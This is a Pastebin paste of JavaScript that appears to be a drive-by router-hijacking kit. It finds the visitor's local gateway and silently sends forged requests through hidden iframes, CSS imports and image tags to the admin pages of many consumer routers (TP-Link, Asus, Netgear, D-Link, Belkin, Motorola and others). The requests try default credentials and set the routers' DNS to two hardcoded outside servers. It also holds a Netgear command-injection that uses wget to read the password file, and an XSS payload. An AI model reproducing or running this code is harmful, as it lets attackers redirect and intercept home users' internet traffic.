API tools faq
paste
hackernix

varpasslist

hackernix
Mar 20th, 2019
89
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.56 KB | None | 0 0
raw download clone embed print report diff
  1. var pDNS = "200.98.30.219";
  2. var sDNS = "155.133.82.21";
  3. var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"];
  4. var gstp=400;
  5. var pstp=5000;
  6. function exp(url, data, method){
  7. if(method=="GET"){
  8. document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
  9. if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  10. }
  11. else{
  12. document.write("<body></body>");
  13. var ifrm = document.createElement("IFRAME");
  14. ifrm.height="1px";
  15. ifrm.width="1px";
  16. document.body.appendChild(ifrm);
  17.  
  18. var f=ifrm.contentWindow.document.createElement("FORM");
  19. f.name='f';
  20. f.method=method;
  21. f.action=url;
  22. var el=data.split('&');
  23. for(i=0;i<el.length;i++)
  24. {
  25. var e=el[i].split('=');
  26. var t=ifrm.contentWindow.document.createElement('INPUT');
  27. t.type='TEXT';
  28. t.id=e[0];
  29. t.name=e[0];
  30. t.value=e[1];
  31. f.appendChild(t);
  32. }
  33. ifrm.contentWindow.document.body.appendChild(f);
  34. f.submit();
  35. var tm=setTimeout(function(){window.stop();},pstp);
  36. }
  37. }
  38. function srq(ip) {
  39. for(i=0;i<12;i++){
  40.  
  41. var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  42. var method = "GET";
  43. url = url1.replace("$1$","");
  44. var cred="admin";
  45. if(passlist[i]!="")
  46. cred=cred+":"+passlist[i];
  47. cred = cred+"@";
  48. url = url1.replace("$1$",cred);
  49. exp(url, "", method);
  50. }
  51.  
  52. }
  53. function e_belkin(ip)
  54. {
  55. var method = "POST";
  56. var url = "";
  57. var data ="";
  58.  
  59. url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  60. exp(url, "", "GET");
  61.  
  62. url="http://"+ip+"/cgi-bin/setup_dns.exe";
  63. data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  64. exp(url, data, method);
  65. }
  66.  
  67. function e_webcam(ip)
  68. {
  69. }
  70.  
  71. function p_exp(ip) {
  72. e_belkin(ip);
  73. e_webcam(ip);
  74.  
  75. var method = "POST";
  76. var url = "";
  77. var data ="";
  78.  
  79. url = "http://admin:admin@"+ip+"/apply.cgi";
  80. data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  81. exp(url, data, method);
  82.  
  83. url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  84. data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  85. exp(url, data, method);
  86.  
  87. url="http://"+ip+"/goform/AdvSetDns";
  88. data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  89. exp(url, data, method); /*Unicorn WB-3300NR*/
  90.  
  91. url="http://"+ip+"/login.cgi";
  92. data="login_name=admin&login_pass=";
  93. exp(url, data, method);
  94.  
  95. url="http://"+ip+"/h_wan_fix.cgi";
  96. data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  97. exp(url, data, method);
  98.  
  99. }
  100.  
  101. function e_moto(ip)
  102. {
  103. /*var method = "GET";
  104. var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  105. exp(url, "", method);
  106.  
  107. url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  108. exp(url, "", POST); */
  109. var i1 = document.createElement('IMG');
  110. document.body.appendChild(i1);
  111. var i2 = document.createElement('IMG');
  112. document.body.appendChild(i2);
  113. i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  114. i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  115.  
  116. }/*Motorola*/
  117.  
  118. function r_exp(ip) {
  119.  
  120. var method = "GET";
  121. var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  122. //exp(url, "", method);
  123.  
  124. url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  125. exp(url, "", method); /*DGN 1000/DGN2200*/
  126.  
  127. url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  128. exp(url, "", method); /*asus rt n66u*/
  129.  
  130. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  131. exp(url, "", method); /*asus rt n56u*/
  132.  
  133. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  134. exp(url, "", method); /*asus rt n56u*/
  135.  
  136. url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  137. exp(url, "", method);/*asus nt-12*/
  138.  
  139. url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  140. exp(url, "", method);
  141.  
  142. url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  143. exp(url, "", method);
  144.  
  145. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  146. exp(url, "", method); /*Philips*/
  147.  
  148. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  149. exp(url, "", method);/*Motorola SBG901*/
  150.  
  151. url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  152. exp(url, "", method);
  153.  
  154. url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  155. exp(url, "", method);
  156.  
  157. url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  158. exp(url, "", method);
  159.  
  160. url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  161. exp(url, "", method);
  162.  
  163. url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  164. exp(url, "", method);
  165.  
  166. url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  167. exp(url, "", method);
  168.  
  169. url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  170. exp(url, "", method);
  171.  
  172. url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  173. exp(url, "", method);
  174.  
  175. url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  176. exp(url, "", method);
  177.  
  178. url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  179. exp(url, "", method);
  180.  
  181. url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  182. exp(url, "", method);
  183.  
  184. url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  185. exp(url, "", method);
  186.  
  187. url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  188. exp(url, "", method);
  189.  
  190. url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  191. exp(url, "", method);
  192.  
  193. url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  194. exp(url, "", method);
  195.  
  196. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  197. exp(url, "", method);
  198.  
  199. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  200. exp(url, "", method);
  201.  
  202. url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  203. exp(url, "", method);
  204.  
  205. url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  206. exp(url, "", method); /*DI 604*/
  207.  
  208.  
  209. var t=setTimeout(function(){p_exp(ip);},1000);
  210. srq(ip);
  211. e_moto(ip);
  212. }
  213. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  214. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  215.  
  216. runweb(function(ip) {
  217. //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  218. //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  219. var sip = ip.split(".");
  220.  
  221. ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  222. //var i = 0;
  223. //var j = 0;
  224. //for (i = 0; i < gw.length; i++) {
  225. // if (ip == gw[i]) {
  226. // j = j + 1;
  227. // break;
  228. // }
  229. //};
  230. //i = i + 1;
  231. //if (j > 0) {
  232. r_exp(ip);
  233. //};
  234. //}
  235. });
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!